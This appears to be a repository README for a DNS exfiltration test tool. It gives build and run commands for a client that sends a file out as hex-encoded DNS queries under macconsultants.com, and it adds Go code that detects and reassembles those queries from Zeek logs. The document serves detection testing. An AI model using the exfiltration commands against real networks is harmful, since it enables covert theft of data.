This is a very basic file exfiltration tool that uses DNS A and AAAA records to exfiltrate files. It is meant as a simple way to test detections for file exfiltration over DNS. The client sends the specified file as both A and AAAA queries; currently the server answers only the A record queries, with a bogus IP address. If Bro (Zeek) is monitoring the traffic, this tool should be flagged as anomalous DNS traffic.
To Use: Server Side
cd dns-exfil-test/server
go mod init server/v2
go get github.com/miekg/dns
go build
./server
To Use: Client Side
cd dns-exfil-test/client
sed -i -e 's|127.0.0.1|[SERVER_IP]|g' go-dnsclient.go
go mod init dns-exfil-text/client
go build
./client [file_to_send]
The client then reads the contents of the file, hex-encodes it, and sends it in 10-character chunks as A record queries. The format of each query is:
[10 hex encoded characters].macconsultants.com
Once the transfer is finished, the server combines all of the hex-encoded data, unhexlifies it, and writes the result as ASCII to a file in the same directory. The output file is called outfile.
The server does not indicate when it is done, but the client does. Once the client reports that it is done, you can kill the server and view the contents of outfile.
You will need to rename outfile if you want to send multiple files, otherwise it will be overwritten.
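The query format above gives a defender a concrete pattern to hunt for in DNS logs: a leftmost label that is entirely hex, at most 10 characters, under the tool's domain. The following is an added example, not part of this repository, that scans Zeek-style query names for that pattern and reassembles the hex chunks so an analyst can see what left the network. The domain macconsultants.com comes from the format above; the query names are constructed sample input.

```go
package main

import (
	"encoding/hex"
	"fmt"
	"regexp"
	"strings"
)

// Constructed sample input: query names as they would appear in the "query"
// column of a Zeek dns.log. The three hex labels decode to "hello world\n".
var sampleQueries = []string{
	"www.example.com",
	"68656c6c6f.macconsultants.com",
	"20776f726c.macconsultants.com",
	"640a.macconsultants.com", // final, shorter chunk
	"mail.macconsultants.com",
}

// chunkLabel matches a leftmost label of 2 to 10 hex characters.
// Note: short real hostnames made only of hex letters (e.g. "ad", "bed")
// also match, so the chunk count, not a single hit, is the useful signal.
var chunkLabel = regexp.MustCompile(`^([0-9a-fA-F]{2,10})\.`)

// ExtractChunks returns, in the order seen, the hex labels of queries under
// domain that fit the tool's [hex].<domain> pattern.
func ExtractChunks(queries []string, domain string) []string {
	var chunks []string
	suffix := "." + domain
	for _, q := range queries {
		if !strings.HasSuffix(q, suffix) {
			continue
		}
		m := chunkLabel.FindStringSubmatch(q)
		if m == nil || len(m[1])%2 != 0 { // hex bytes come in pairs
			continue
		}
		chunks = append(chunks, m[1])
	}
	return chunks
}

// Reassemble decodes the collected chunks back into the transferred bytes.
func Reassemble(chunks []string) ([]byte, error) {
	return hex.DecodeString(strings.Join(chunks, ""))
}

func main() {
	chunks := ExtractChunks(sampleQueries, "macconsultants.com")
	data, err := Reassemble(chunks)
	fmt.Printf("%d chunks, err=%v, data=%q\n", len(chunks), err, data)
}
```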